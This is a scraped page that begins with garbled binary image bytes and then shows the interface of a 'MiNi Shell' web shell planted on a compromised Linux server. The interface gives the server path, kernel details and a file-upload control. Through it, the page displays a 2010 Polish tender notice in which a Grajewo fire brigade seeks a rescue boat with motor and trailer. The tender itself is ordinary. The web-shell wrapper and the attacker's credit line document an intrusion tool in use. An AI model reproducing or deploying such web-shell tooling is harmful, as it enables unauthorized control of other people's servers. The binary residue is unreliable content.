JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100427/99647-N-2010.html

<p class="kh_header"><b>Grajewo: Doposażenie Komendy Powiatowej Państwowej Straży Pożarnej w Grajewie w łódź ratowniczą służącą do likwidacji zagrożeń chemiczno-ekologicznych na zbiornikach wodnych</b><br>
<b>Numer ogłoszenia: 99647 - 2010; data zamieszczenia: 27.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Powiatowa Państwowej Straży Pożarnej w Grajewie , ul. Wojska Polskiego 74, 19-200 Grajewo, woj. podlaskie, tel. 086 2723281, faks 086 2723281.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grajewo.straz.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Administracja zespolona terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doposażenie Komendy Powiatowej Państwowej Straży Pożarnej w Grajewie w łódź ratowniczą służącą do likwidacji zagrożeń chemiczno-ekologicznych na zbiornikach wodnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup hybrydowej łodzi ratowniczej służącej do likwidacji zagrożeń chemiczno-ekologicznych na zbiornikach wodnych na potrzeby Komendy Powiatowej Państwowej Straży Pożarnej w Grajewie.

Obligatoryjne wymagania: sprzęt musi być fabrycznie nowy, wyprodukowany w 2009r. lub 2010r., gwarancja na sprzęt minimum 24 miesiące od daty dostawy, czas reakcji serwisu w okresie gwarancji w przypadku zgłoszenia awarii maksymalnie 14 dni

MINIMALNE WYMAGANIA TECHNICZNE DLA HYBRYDOWEJ ŁODZI RATOWNICZEJ TYPU (RIB) WRAZ Z SILNIKIEM I PRZYCZEPKĄ DO PRZEWOŻENIA:

Wymagania odnoszące się do przedmiotu zamówienia wraz z określeniem dokumentów, które należy przedstawić: 1. Wszystkie elementy, dla których jest to wymagane powinny posiadać świadectwo dopuszczenia do użytkowania w ochronie przeciwpożarowe wydane przez CNBOP. Dostawca dostarczy powyższe certyfikaty przy odbiorze przedmiotu umowy. 2. Dostawca dostarczy dokumenty, potwierdzające spełnianie żądanych w SIWZ parametrów użytkowych przez zamawiane urządzenia, przy odbiorze przedmiotu umowy.

OPIS WYMAGAŃ:

ŁÓDŹ RATOWNICZA HYBRYDOWA TYPU RIB Z SILNIKIEM I PRZYCZEPKĄ:

ŁÓDŹ: Długość całkowita większa od 5m mniejsza 5,35m, Długość wewnętrzna większa od 3,50m, Szerokość całkowita większa od 2,25m, Szerokość wewnętrzna większa od 1,20m, Waga łodzi z silnikiem (bez paliwa) maksymalnie 1000kg, Świadectwo klasy łodzi wydane przez Polski Rejestr Statków, Kolor: Kołnierze (tuby) - czerwone,  napisy i oznaczenia - białe, kadłub, pokład i konsola - czerwony RAL 3000 lub podobny, Liczba osób: minimum 6.
KADŁUB: Kadłub laminatowy wzmocniony, Pokład roboczo - ładunkowy wzmocniony wykonany z materiału antypoślizgowego zapewniający odpływanie wody, Długość pokładu przed konsolą łącznie z bakistą dziobową minimum 1,4m, Bakista dziobowa 1szt., Kil na całej długości okutym kątownikiem ze stali nierdzewnej, Uchwyt holowniczy (cumowniczy) na dziobie i rufie 3szt. (1szt. na dziobie, 2szt. na rufie), Uszy zawiesia 4szt., Płyta pawężowa pod silnik 1szt., Wysokość pawęży L, Otwory wylotowe z korkiem do wyciekania wody z pokładu łodzi na rufie, Instalacja zęzowa pompa zęzowa elektryczna i ręczna, odpływ zęzowy.
TUBY: Tuby pneumatyczne z tkaniny gumowej ORCA (Hypalon 1670 dtex) lub równoważny, Średnica tub większa od 0,40m mniejsza od 0,6m, Ilość komór wypornościowych w tubach minimum 5, Antypoślizgowe maty na tubach minimum po 4 na burtę, Zawory napełniająco/upustowe oraz nadmiarowe, Odbojnice na tubach na burtach i dziobie na całej długości, podwójne, Uchwyty gumowe min.4szt. (min. po 2 na burtę), Zewnętrzna linka burtowa 1kpl., Wewnętrzna linka burtowa 1kpl., Uchwyty wioseł na tubach 2szt., Uchwyt bosaka na tubach 1szt., Na dziobie i rufie knagi cumownicze 4szt., Podest dziobowy z rolką kotwiczną 1szt. na dziobie, Oznakowanie napis STRAŻ na tubach pneumatycznych, Oznaczenie operacyjne zgodnie z wytycznymi KG PSP do uzgodnienia z zamawiającym w trakcie realizacji na tubach pneumatycznych.
KONSOLA: Konsola z siedziskiem 1 osobowym z oparciem, owiewką i relingiem. Siedzisko wykonane z materiałów łatwo zmywalnych, odpornych na ścieranie i rozdarcie. Konsola i siedzisko zamontowane w części rufowej łodzi (maksymalnie z  tyłu) na środku łodzi, Konsola wyposażona w: obrotomierz, prędkościomierz, wskaźnik poziomu paliwa, sygnał dźwiękowy, panel elektryczny do obsługi urządzeń z głównym wyłącznikiem prądu, instalacja elektryczna zasilająca 12V - 1kpl. zamykane gniazdo zapalniczki,  osprzęt do silnika: wiązka przewodów, cięgna biegów i gazu - 1kpl., Układ sterowania hydrauliczny: kierownica, przekładnia, sterociąg - 1kpl. Siedzisko poprzeczne z oparciem wykonane z materiałów łatwo zmywalnych, odpornych na ścieranie i rozdarcie zamontowane w części rufowej łodzi (maksymalnie z  tyłu) za konsolą z siedziskiem 1 osobowym z oparciem, Radiotelefon przewoźny dopuszczony do stosowania w sieci PSP w zakresie częstotliwości VHF 136-174 MHz, moc 1-25 W, odstęp międzykanałowy 12,5 kHz, nie mniej niż 100 kanałów, wraz z instalacją antenową i zasilającą (model Motorola GM 380 lub równoważny) zamontowany na konsoli, osłonięty przed wpływem opadów atmosferycznych.
INSTALACJA ELEKTRYCZNA: 12V z biegunem ujemnym na masie, Moc alternatora i pojemność akumulatora zapewniająca pełne zapotrzebowanie na energię elektryczną przy jej maksymalnym obciążeniu. Akumulator bezobsługowy zapewniające obsługę wszystkich urządzeń na łodzi łącznie z rozruchem silnika. Wyposażenie w główny wyłącznik prądu. Przedział (skrytka) akumulatora powinien być wentylowany, zabezpieczony przed działaniem warunków atmosferycznych a jego konstrukcja powinna zapewniać łatwy dostęp do akumulatora podczas kontroli i konserwacji, akumulator 1 sztuka. Integralny układu prostowniczy do ładowania akumulatora z zewnętrznego źródła prądu przemiennego 230 V, wyposażony w gniazdo przyłączeniowe, sygnalizację podłączenia świetlną i dźwiękową do zewnętrznego źródła, wtyczka do instalacji ładowania akumulatorów w ukompletowaniu łodzi. Przewidzieć zasilanie echo sondy sposób i miejsce zamocowania uzgodnić z zamawiającym.
MASZT RUFOWY: maszt ze stali nierdzewnej z mocowaniami na 2 koła ratunkowe rodzaj mocowania kół ratunkowych uzgodnić z zamawiającym, Halogeny oświetleniowe z możliwością regulacji ręcznej padania światła z burty na burtę zamontowane na maszcie rufowym, Urządzenie sygnalizacyjno - ostrzegawcze, akustyczne umożliwiające podawanie komunikatów słownych i świetlnych (Belka świetlna sygnałowa z napisem (STRAŻ) umieszczona na maszcie rufowym), obsługa urządzenia z pulpitu sterowniczego konsoli. Oświetlenie nawigacyjne zgodne z wymogami dla statków na śródlądowych drogach wodnych - 1kpl. oświetlenie umieszczone na maszcie rufowym
UKŁAD NAPĘDOWY: Silnik zaburtowy z rozruchem elektrycznym: dobrany do typu łodzi, o czterosuwowym cyklu pracy z bezpośrednim wtryskiem paliwa o mocy 90KM, wyposażony w elektryczną instalacją silnikową i instalację paliwową oraz osprzętem do silnika (cięgna, manetka), paliwo benzyna bezołowiowa 95, Pojemność skokowa silnika maksymalnie 1500cm3, Ciężar silnika maksymalnie 169kg, Napęd śrubowy śruba aluminiowa, Zbiornik na paliwo stacjonarny ze stali nierdzewnej z zaworem odcinającym wraz z instalacją paliwową 1szt. o pojemności min. 40l - zabudowany.
PRZYCZEPKA DO PRZEWOŻENIA ŁODZI: Przyczepka transportowa do łodzi (właściwościami odpowiednio dostosowana do typu łodzi), konstrukcja ze stali cynkowanej ogniowo, przystosowana do holowania samochodami osobowymi, hamulec najazdowy i postojowy, belka do slipowania, podparcie rolki, koło zapasowe wraz z elementem mocującym, wciągarka D-L, koło podporowe, nierdzewne linki hamulcowe, wodoodporne łożyska, narzędzia do obsługi przyczepy: klucz, podnośnik, pasy mocujące, komplet dokumentów niezbędnych do rejestracji.
WYPOSAŻENIE i WYMAGANIA DODATKOWE: Kompas zamontowany na konsoli, Echosonda z GPS Lowrance HDS-8 COMBO lub równoważna: kolorowy wyświetlacz o przekątnej min 8 cali, rozdzielczość minimum 600x800 pixeli, zasilana z instalacji elektrycznej łodzi, przystosowana do pracy na łodziach, możliwość zapisu wskazań, maks. głębokość penetracji  min. 4000m. Reflektor ręczny (szperacz) z mocowaniem przy konsoli. Koło ratunkowe 2szt. Gaśnica proszkowa ABC 6 kg 1 szt. zamontowana w łodzi. Kotwica o wadze min. 15kg. z liną o długości min. 30m 1kpl. Apteczka 1szt. Zestaw naprawczy łodzi z pompką 1kpl. Narzędzia do obsługi łodzi 1kpl. Liny cumownicze 1kpl. Lina pływająca o długości minimum 40m i średnicy 12mm na bębnie 2kpl. Buty gumowe wodery z szelkami 2 kpl. rozmiar uzgodnić z zamawiającym. Wiosło aluminiowe składane 2szt. zamocowane do tuby. Bosak 1szt. zamocowany do tuby. Instruktaż dla minimum 4 osób - pracowników Zamawiającego. Pełen zbiornik paliwa. Do oferty należy dołączyć rysunki poglądowe: boki, przód, tył z wymiarami. Miejsce dostawy Komenda Powiatowa Państwowej Straży Pożarnej w Grajewie, ul. Wojska Polskiego 74, 19-203 Grajewo. Koszt dostawy ponosi Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.52.14.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający będzie dokonywał oceny spełniania tych warunków na podstawie oświadczenia wykonawcy oraz oceny wymaganych dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający będzie dokonywał oceny spełniania tych warunków na podstawie oświadczenia wykonawcy oraz oceny wymaganych dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający będzie dokonywał oceny spełniania tych warunków na podstawie oświadczenia wykonawcy oraz oceny wymaganych dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający będzie dokonywał oceny spełniania tych warunków na podstawie oświadczenia wykonawcy oraz oceny wymaganych dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający będzie dokonywał oceny spełniania tych warunków na podstawie oświadczenia wykonawcy oraz oceny wymaganych dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.grajewo.straz.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 19-203 Grajewo, ul. Wojska Polskiego 74.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2010 godzina 11:00, miejsce: Komenda Powiatowa Państwowej Straży Pożarnej w Grajewie, 19-203 Grajewo, ul. Wojska Polskiego 74.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> brak.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com